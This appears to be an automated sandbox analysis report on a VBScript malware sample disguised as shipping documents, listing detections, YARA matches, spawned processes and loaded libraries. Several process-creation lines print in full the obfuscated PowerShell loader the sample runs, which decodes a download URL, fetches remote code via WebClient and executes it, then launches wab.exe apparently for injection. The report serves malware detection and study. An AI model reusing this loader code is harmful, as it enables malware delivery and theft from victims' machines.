SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFB4B24C342 3_2_00007FFB4B24C342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFB4B24B596 3_2_00007FFB4B24B596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02E0F258 7_2_02E0F258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02E0FB28 7_2_02E0FB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02E0A2A0 7_2_02E0A2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02E0A59D 7_2_02E0A59D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02E009AD 7_2_02E009AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02E0EF10 7_2_02E0EF10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02E0D604 7_2_02E0D604
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_02DF4AC0 11_2_02DF4AC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_02DF3EA8 11_2_02DF3EA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_02DF41F0 11_2_02DF41F0
Java / VBScript file with very long strings (likely obfuscated code)
Source: Shipping Dcuments_CI PKL_HL_.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_1836.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6816, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Electronegative.Sha Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0klmoaqc.utu.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6816
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1836
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
